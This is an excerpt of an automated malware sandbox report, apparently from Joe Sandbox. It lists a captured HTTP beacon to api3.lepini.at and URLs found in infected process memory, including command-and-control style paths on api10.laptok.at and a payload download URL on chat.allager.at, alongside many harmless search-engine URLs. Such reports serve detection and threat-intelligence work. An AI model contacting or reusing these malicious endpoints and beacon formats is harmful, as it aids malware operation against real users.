            Source: unknownHTTP traffic detected: POST /api1/UIQiXLAMLg4t/Rxi8q7e6zSs/ppLkAThUDmfSS4/yOwm_2Fga2xC15DtBLwwh/NmjWIzvmns9CddET/_2BZ8hEeadvYwxh/uFd3lt60_2FyFVn_2B/iXlprICf_/2B45OhMJZjYIDjqw_2Fm/eJGvB3vDUzSSCsuPGEa/M5YE6Mv5RHrzGnZcbFsa5w/jziyOzx_2FuIu/uDOGy6Dr/GOjy4MP82vBaLdGCF5ixS2x/rbQcfTwYvE/gJjw4kL5BH7Kw6DJX/9XhSSfgVL_2B/BdxG6AZO_0A/_0Dtw28OxMea_2/Ff8pUZzLyl3SHdNWDlXEm/PFk1VIj4/S9_2B75z5/EF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Sep 2020 23:23:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: {81817910-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DFF147473DA56FBCCD.TMP.13.drString found in binary or memory: http://api10.laptok.at/api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsf
            Source: {81817912-F663-11EA-90E2-ECF4BB862DED}.dat.13.drString found in binary or memory: http://api10.laptok.at/api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ej
            Source: explorer.exe, 0000001D.00000000.558338655.0000000007E1D000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3
            Source: explorer.exe, 0000001D.00000000.544734516.0000000000E60000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/x
            Source: {81817914-F663-11EA-90E2-ECF4BB862DED}.dat.13.dr, ~DF637F64B7AC0A53C0.TMP.13.drString found in binary or memory: http://api10.laptok.at/api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPB
            Source: explorer.exe, 0000001D.00000003.591331392.000000000F2D0000.00000004.00000040.sdmpString found in binary or memory: http://api10.laptok.at/favicon.icoyu1SPS
            Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at/gs-
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639553770.00000000063BB000.00000004.00000001.sdmpString found in binary or memory: http://chat.allager.at/jvassets/xI/t64.dat
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.560164145.000000000E1DB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001D.00000000.544775772.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
